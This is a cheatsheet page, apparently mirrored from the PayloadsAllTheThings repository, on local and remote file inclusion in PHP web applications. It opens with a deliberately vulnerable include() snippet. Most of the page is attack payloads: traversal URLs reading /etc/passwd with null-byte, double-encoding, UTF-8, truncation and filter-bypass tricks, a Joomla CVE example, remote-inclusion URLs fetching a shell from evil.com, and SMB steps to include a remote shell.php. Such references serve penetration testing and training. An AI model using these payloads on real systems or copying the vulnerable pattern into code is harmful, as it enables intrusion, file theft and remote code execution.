daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (6990B)


      1 ---
      2 title: "File Inclusion"
      3 topic: "File Inclusion"
      4 topicSlug: "file-inclusion"
      5 sourcePath: "File Inclusion/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/File%20Inclusion/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # File Inclusion
     12 
     13 > A File Inclusion Vulnerability refers to a type of security vulnerability in web applications, particularly prevalent in applications developed in PHP, where an attacker can include a file, usually exploiting a lack of proper input/output sanitization. This vulnerability can lead to a range of malicious activities, including code execution, data theft, and website defacement.
     14 
     15 ## Summary
     16 
     17 - [Tools](#tools)
     18 - [Local File Inclusion](#local-file-inclusion)
     19     - [Null Byte](#null-byte)
     20     - [Double Encoding](#double-encoding)
     21     - [UTF-8 Encoding](#utf-8-encoding)
     22     - [Path Truncation](#path-truncation)
     23     - [Filter Bypass](#filter-bypass)
     24 - [Remote File Inclusion](#remote-file-inclusion)
     25     - [Null Byte](#null-byte-1)
     26     - [Double Encoding](#double-encoding-1)
     27     - [Bypass allow_url_include](#bypass-allow_url_include)
     28 - [Labs](#labs)
     29 - [References](#references)
     30 
     31 ## Tools
     32 
     33 - [P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus) (archived on Oct 7, 2020) - kadimus is a tool to check and exploit lfi vulnerability.
     34 - [D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite) - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner
     35 - [kurobeats/fimap](https://github.com/kurobeats/fimap) - fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps.
     36 - [lightos/Panoptic](https://github.com/lightos/Panoptic) - Panoptic is an open source penetration testing tool that automates the process of search and retrieval of content for common log and config files through path traversal vulnerabilities.
     37 - [hansmach1ne/LFImap](https://github.com/hansmach1ne/LFImap) - Local File Inclusion discovery and exploitation tool
     38 
     39 ## Local File Inclusion
     40 
     41 **File Inclusion Vulnerability** should be differentiated from **Path Traversal**. The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application, when the File Inclusion will lead to the execution of arbitrary code.
     42 
     43 Consider a PHP script that includes a file based on user input. If proper sanitization is not in place, an attacker could manipulate the `page` parameter to include local or remote files, leading to unauthorized access or code execution.
     44 
     45 ```php
     46 <?php
     47 $file = $_GET['page'];
     48 include($file);
     49 ?>
     50 ```
     51 
     52 In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files.
     53 
     54 ```powershell
     55 http://example.com/index.php?page=../../../etc/passwd
     56 ```
     57 
     58 ### Null Byte
     59 
     60 :warning: In versions of PHP below 5.3.4 we can terminate with null byte (`%00`).
     61 
     62 ```powershell
     63 http://example.com/index.php?page=../../../etc/passwd%00
     64 ```
     65 
     66 **Example**: Joomla! Component Web TV 1.0 - CVE-2010-1470
     67 
     68 ```ps1
     69 {{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00
     70 ```
     71 
     72 ### Double Encoding
     73 
     74 ```powershell
     75 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
     76 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
     77 ```
     78 
     79 ### UTF-8 Encoding
     80 
     81 ```powershell
     82 http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
     83 http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
     84 ```
     85 
     86 ### Path Truncation
     87 
     88 On most PHP installations a filename longer than `4096` bytes will be cut off so any excess chars will be thrown away.
     89 
     90 ```powershell
     91 http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
     92 http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
     93 http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] 
     94 http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
     95 ```
     96 
     97 ### Filter Bypass
     98 
     99 ```powershell
    100 http://example.com/index.php?page=....//....//etc/passwd
    101 http://example.com/index.php?page=..///////..////..//////etc/passwd
    102 http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
    103 ```
    104 
    105 ## Remote File Inclusion
    106 
    107 > Remote File Inclusion (RFI) is a type of vulnerability that occurs when an application includes a remote file, usually through user input, without properly validating or sanitizing the input.
    108 
    109 Remote File Inclusion doesn't work anymore on a default configuration since `allow_url_include` is now disabled since PHP 5.
    110 
    111 ```ini
    112 allow_url_include = On
    113 ```
    114 
    115 Most of the filter bypasses from LFI section can be reused for RFI.
    116 
    117 ```powershell
    118 http://example.com/index.php?page=http://evil.com/shell.txt
    119 ```
    120 
    121 ### Null Byte
    122 
    123 ```powershell
    124 http://example.com/index.php?page=http://evil.com/shell.txt%00
    125 ```
    126 
    127 ### Double Encoding
    128 
    129 ```powershell
    130 http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
    131 ```
    132 
    133 ### Bypass allow_url_include
    134 
    135 When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol.
    136 
    137 1. Create a share open to everyone
    138 2. Write a PHP code inside a file : `shell.php`
    139 3. Include it `http://example.com/index.php?page=\\10.0.0.1\share\shell.php`
    140 
    141 ## Labs
    142 
    143 - [Root Me - Local File Inclusion](https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion)
    144 - [Root Me - Local File Inclusion - Double encoding](https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion-Double-encoding)
    145 - [Root Me - Remote File Inclusion](https://www.root-me.org/en/Challenges/Web-Server/Remote-File-Inclusion)
    146 - [Root Me - PHP - Filters](https://www.root-me.org/en/Challenges/Web-Server/PHP-Filters)
    147 
    148 ## References
    149 
    150 - [CVV #1: Local File Inclusion - SI9INT - June 20, 2018](https://web.archive.org/web/20200724150218/https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
    151 - [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction - Mannu Linux - May 12, 2019](https://web.archive.org/web/20260220172333/https://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html)
    152 - [Is PHP vulnerable and under what conditions? - Andreas Venieris - April 13, 2015](https://web.archive.org/web/20250209181954/http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
    153 - [LFI Cheat Sheet - @Arr0way - April 24, 2016](https://web.archive.org/web/20180121083456/https://highon.coffee/blog/lfi-cheat-sheet/)
    154 - [Testing for Local File Inclusion - OWASP - June 25, 2017](https://web.archive.org/web/20131021005706/https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
    155 - [Turning LFI into RFI - Grayson Christopher - August 14, 2017](https://web.archive.org/web/20170815004721/https://l.avala.mp/?p=241)